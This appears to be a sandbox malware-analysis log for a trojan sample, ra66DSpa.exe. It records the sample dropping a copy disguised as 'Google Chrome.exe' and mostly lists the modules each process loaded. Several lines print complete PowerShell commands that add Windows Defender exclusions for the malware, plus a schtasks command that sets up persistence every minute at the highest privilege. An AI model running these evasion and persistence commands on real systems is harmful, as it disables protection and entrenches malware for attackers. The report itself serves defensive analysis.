            Source: ra66DSpa.exe, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ra66DSpa.exe, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Google Chrome.exe.0.dr, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Google Chrome.exe.0.dr, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@20/20@2/2
            Source: C:\Users\user\Desktop\ra66DSpa.exe | File created: C:\Users\user\AppData\Local\Google Chrome.exe
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Mutant created: \Sessions\1\BaseNamedObjects\qzRueo4pn2rjItZU
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2864:120:WilError_03
            Source: C:\Users\user\Desktop\ra66DSpa.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
            Source: ra66DSpa.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ra66DSpa.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\ra66DSpa.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: ra66DSpa.exe | ReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\ra66DSpa.exe | File read: C:\Users\user\Desktop\ra66DSpa.exe
            Source: unknown | Process created: C:\Users\user\Desktop\ra66DSpa.exe "C:\Users\user\Desktop\ra66DSpa.exe"
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\user\AppData\Local\Google Chrome.exe "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Local\Google Chrome.exe "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Local\Google Chrome.exe "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Local\Google Chrome.exe "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: avicap32.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: msvfw32.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Section loaded: winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: vcruntime140_clr0400.dll
